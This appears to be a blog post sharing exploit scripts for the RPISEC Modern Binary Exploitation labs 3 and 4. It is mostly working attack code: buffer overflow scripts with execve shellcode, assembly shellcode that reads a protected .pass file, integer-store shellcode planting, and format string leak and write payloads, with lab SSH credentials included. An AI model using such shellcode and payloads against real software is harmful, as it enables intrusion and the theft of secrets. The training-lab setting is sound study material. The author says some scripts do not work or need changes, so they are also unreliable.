[MBE RPI SEC]Lab 3 and 4

19 Feb 2019

I did these labs one year ago and I don’t remember very well what I did. But I conserved some of my scripts so I share these here.

lab3C

lab3B

lab3A

lab4C

lab4B-A

1) lab3c

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *
# It is a basic buffer overflow exploitation with a classic shellcode.
#payload = cyclic(400)
payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*(329-23)
payload += "\x46\x9C\x04\x08" + "A"*200
s =  ssh(host='10.10.20.119', user='lab3C', password='lab03start')
p = s.process('/levels/lab03/lab3C')
pause()
p.sendline("rpisec"+payload)
p.interactive()

2) lab3b

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

# I remember that it is not possible to call excve. So I made my own shellcode in order to read the .pass file. I just have the shellcode. I think it is enough to solve the challenge.

payload += asm(
"""
jmp one

two:
pop ebx
xor eax, eax
mov al, 5
xor ecx, ecx
xor edx, edx
int 0x80

xor ebx, ebx
mov ebx, eax
mov al, 3
mov ecx, esp
mov dl, 255
int 0x80

mov al, 4
xor ebx, ebx
mov bl, 1
int 0x80

mov al, 1
xor ebx, ebx
int 0x80

one:
call two
.string "/home/lab3A/.pass"
"""
)

3) lab3a

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *

# I remember that the buffer is cut by null character or something like this
# For each three characters. So I changed my shellcode with jmp instructions to chain
# the execution.

# The following script doesn't work but I remember I solved this with jmp instruction.

s = ssh(host='10.10.10.119', user='lab3A', password='wh0_n33ds_5h3ll3_wh3n_U_h4z_s4nd')
p = s.process("/levels/lab03/lab3A")

p.sendline("store")
p.recvuntil("Number: ")
p.sendline("3947937841")
p.recvuntil("Index: ")
p.sendline("4")

p.sendline("store")
p.recvuntil("Number: ")
p.sendline("2425393171")
p.recvuntil("Index: ")
p.sendline("5")

p.sendline("store")
p.recvuntil("Number: ")
p.sendline("1932472168")
p.recvuntil("Index: ")
p.sendline("10")

p.sendline("store")
p.recvuntil("Number: ")
p.sendline("2417093480")
p.recvuntil("Index: ")
p.sendline("11")

p.sendline("store")
p.recvuntil("Number: ")
p.sendline("1768042344")
p.recvuntil("Index: ")
p.sendline("16")

p.sendline("store")
p.recvuntil("Number: ")
p.sendline("2417093486")
p.recvuntil("Index: ")
p.sendline("17")

p.sendline("store")
p.recvuntil("Number: ")
p.sendline("2303779721")
p.recvuntil("Index: ")
p.sendline("22")

p.sendline("store")
p.recvuntil("Number: ")
p.sendline("283857890")
p.recvuntil("Index: ")
p.sendline("23")

p.sendline("store")
p.recvuntil("Number: ")
p.sendline("196141449")
p.recvuntil("Index: ")
p.sendline("28")

p.sendline("store")
p.recvuntil("Number: ")
p.sendline("2425389261")
p.recvuntil("Index: ")
p.sendline("29")

p.sendline("store")
p.recvuntil("Number: ")
p.sendline("2425389261")
p.recvuntil("Index: ")
p.sendline("29")
pause()

p.sendline("store")
p.recvuntil("Number: ")
p.sendline("3221222536")
p.recvuntil("Index: ")
p.sendline("109")

p.sendline("quit")
p.interactive()

4) lab4c

#! /usr/bin/python2.7
# -*- coding: utf-8 -*-

from pwn import *
# classic format string. The password is loaded on the stack so I just need to read this with the good format string.
s =  ssh(host='192.168.1.104', user='lab4C', password='lab04start')
p = s.process('/levels/lab04/lab4C')
pause()
#p.sendline("%08x|"*5)
p.sendline("%08x|"*4+"%s")
pause()
#p.sendline("AABBBB")
p.sendline("AA"+"\x06\xfc\xff\xbf")
p.interactive()

5) lab4b and lab4a

I don’t preserve payload for the challenge lab4b. I used the following payload to solve lab4a.

$(python -c 'print "B\x6e\xfd\xff\xbf\x6c\xfd\xff\xbf\x72\xfd\xff\xbf\x70\xfd\xff\xbf\x76\xfd\xff\xbf\x74\xfd\xff\xbf%16365x%14$hn%45450x%15$hn%x%16$hn%x%17$hn%20089x%18$hn%47628x%19$hn"')

But you need to change the memory overwritten to get the shell.

You can see my post on stackexchange here.

I had some problem using my payload without gdb and I used a return libc attack to solve the challenge. So, it is a complicated way to solve this.